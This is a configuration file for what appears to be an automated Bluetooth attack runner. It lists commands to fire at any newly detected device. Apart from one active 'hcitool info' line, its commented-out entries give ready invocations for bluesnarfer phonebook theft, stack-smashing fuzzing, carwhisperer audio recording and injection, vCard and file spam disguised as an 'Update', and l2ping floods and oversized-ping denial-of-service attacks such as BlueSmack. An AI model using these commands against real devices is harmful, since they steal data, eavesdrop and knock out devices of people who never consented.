# HOW TO USE
# - Type in the Bluetooth tool you want to run when a new device is detected.
# - Lines starting with # will be ignored.
# - Commands are run in the order they are writen in this config file.
# - '*' represents the target Bluetooth device address


### hcitool info ###
hcitool info *


### bluesnarf ###
# ./bluesnarfer -r A-Z -b *


### bluetooth stack smasher ###
# ./bss -s 100 -m 12 -M 0 * 


### carwhisperer ###
# ./carwhisperer 0 audio.raw recorded.raw * 7 


### vCardBlaster ###
# ./vcblaster -g -t 10 *


### blueper ###
# ./blueper -e -s 1000 -t delete_me -n Update *


### psm_scan ###
# ./psm_scan -c -e 4095 *

### ping flood ###
# l2ping -f -c 100 *


### reverse ping flood ###
# l2ping -f -r -c 10 *


### tanya ###
# l2ping -s 4000 -c 10 *


### BlueSmack ###
# l2ping -s 600 -c 10 *


### ussp-push ###
# ussp-push *@ file_upload file_remote
